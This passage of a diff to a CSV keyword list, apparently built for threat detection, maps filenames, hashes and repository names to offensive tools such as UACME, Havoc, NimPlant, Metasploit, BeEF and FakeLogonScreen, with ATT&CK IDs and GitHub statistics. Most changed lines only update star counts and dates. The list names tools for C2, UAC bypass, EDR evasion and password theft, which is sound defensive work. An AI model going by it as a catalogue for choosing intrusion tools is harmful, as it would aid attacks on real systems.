Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*f1zm0/hades*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" -"*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*F3C62326-E221-4481-AC57-EF7F76AAF27B*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" -"*f4081a8e30f75d46.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*f4081a8e30f75d46.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*F5BIG-Scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" -"*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*FA0DAF13-5058-4382-AE07-65E44AFB5592*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*Fadi002/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*Fadi002/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" "*Fake Computer Objects Honey Pots*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Fake Service Accounts Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*fake_ap.py*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" -"*fake_common_roots.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*fake_default_wordlist.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*fake_evernote_clipper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*fake_flash_update*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*fake_lastpass/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*fake_notification_ff/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*FakeAMSI.c*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeAMSI.dll*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeAMSI.exe*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeCmdLine.*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*FakeDriver.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*FakeDriver2.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*fake_common_roots.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_default_wordlist.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_evernote_clipper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_flash_update*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_lastpass/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_notification_ff/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*FakeAMSI.c*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.dll*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.exe*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeCmdLine.*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeDriver.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*FakeDriver2.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*fakefuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fakefuse.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*FakeImageExploiter*","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","9","843","356","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z" @@ -10207,9 +10358,9 @@ "*FakeLogonScreen.csproj*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakelogonscreen.exe*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*FakeLogonScreen.sln*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" -"*fakepath31337*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*fakepath31337*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*FakePPID.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 